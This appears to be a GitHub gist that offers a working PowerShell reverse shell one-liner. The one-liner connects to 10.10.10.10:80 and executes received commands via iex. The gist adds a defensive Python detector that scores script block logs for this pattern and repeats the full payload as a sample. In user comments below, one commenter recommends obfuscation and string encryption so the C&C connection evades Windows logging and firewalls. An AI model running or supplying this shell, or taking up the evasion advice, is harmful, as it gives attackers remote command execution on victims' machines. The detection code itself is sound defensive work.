PowerShell reverse shell one-liner by Nikhil SamratAshok Mittal (@samratashok)
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
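A defender-side check for the behaviour in the one-liner above, added here as an example that is not part of the gist: it scores PowerShell script block log entries (Event ID 4104 style records, constructed inline, with the gist's own line used as one sample) on co-occurring indicators such as a `TcpClient`, a `GetStream`/`Read` loop and `iex`, so that a single legitimate `TcpClient` connectivity test stays below the alert threshold while the full pattern does not. The record layout, indicator weights and threshold are assumptions chosen for illustration, not a documented Windows or vendor format.

```python
import re
from dataclasses import dataclass, field

# Indicators are (name, regex, weight). Weights and the threshold are assumptions for
# illustration; in practice they would be tuned against the environment's own baseline.
INDICATORS = [
    ("tcp_client",      re.compile(r"Net\.Sockets\.TCPClient", re.I), 3),
    ("get_stream",      re.compile(r"\.GetStream\(\)", re.I), 2),
    ("read_loop",       re.compile(r"\.Read\(\s*\$\w+\s*,", re.I), 1),
    ("invoke_expr",     re.compile(r"(?<![\w-])(iex|Invoke-Expression)(?![\w-])", re.I), 3),
    ("stream_write",    re.compile(r"\.Write\(\s*\$\w+\s*,", re.I), 1),
    ("out_string",      re.compile(r"Out-String", re.I), 1),
    ("stderr_redirect", re.compile(r"2>&1"), 1),
]
THRESHOLD = 6  # assumed: a lone TcpClient (3) or Out-String (1) must not alert on its own


@dataclass
class ScriptBlockEvent:
    """Simplified stand-in for a PowerShell Operational log record (constructed)."""
    record_id: int
    computer: str
    event_id: int
    script_block_text: str


@dataclass
class Finding:
    record_id: int
    computer: str
    score: int
    indicators: list = field(default_factory=list)


def score_script_block(text):
    """Return (score, matched indicator names) for one script block."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return score, hits


def detect(events, threshold=THRESHOLD):
    """Flag 4104 (script block logging) records whose indicator score reaches the threshold."""
    findings = []
    for ev in events:
        if ev.event_id != 4104:
            continue
        score, hits = score_script_block(ev.script_block_text)
        if score >= threshold:
            findings.append(Finding(ev.record_id, ev.computer, score, hits))
    return findings


# Constructed sample records: a benign listing, the gist's one-liner, and a legitimate
# TcpClient connectivity check that should not alert.
SAMPLE_EVENTS = [
    ScriptBlockEvent(1, "WS01", 4104, r"Get-ChildItem C:\Users | Out-String"),
    ScriptBlockEvent(2, "WS01", 4104,
        '$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);'
        '$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};'
        'while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;'
        '$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);'
        '$sendback = (iex $data 2>&1 | Out-String );'
        '$sendback2 = $sendback + "PS " + (pwd).Path + "> ";'
        '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);'
        '$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'),
    ScriptBlockEvent(3, "WS02", 4104,
        "$t = New-Object System.Net.Sockets.TcpClient; $t.Connect('db01', 1433); $t.Connected"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"record {f.record_id} on {f.computer}: score {f.score}, indicators {f.indicators}")
```

Script block logging must be enabled for 4104 records to exist at all; a score on a single artefact is deliberately kept below the threshold so that ordinary `TcpClient` use in admin scripts does not page anyone, and the combination of socket, read loop and `iex` is what carries the weight.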
ThunderSon commented Jul 9, 2018

Hello. Kindly check my fork to the project. The IP field has a typo.

egre55 (Owner Author) commented Jul 9, 2018

hey, thanks for the heads up!


chnz2k commented Apr 15, 2019

Using sockets without obfuscation or string encryption is a high risk: Windows can log the data connection to the C&C server, and some firewalls such as ZoneAlarm block the packets.
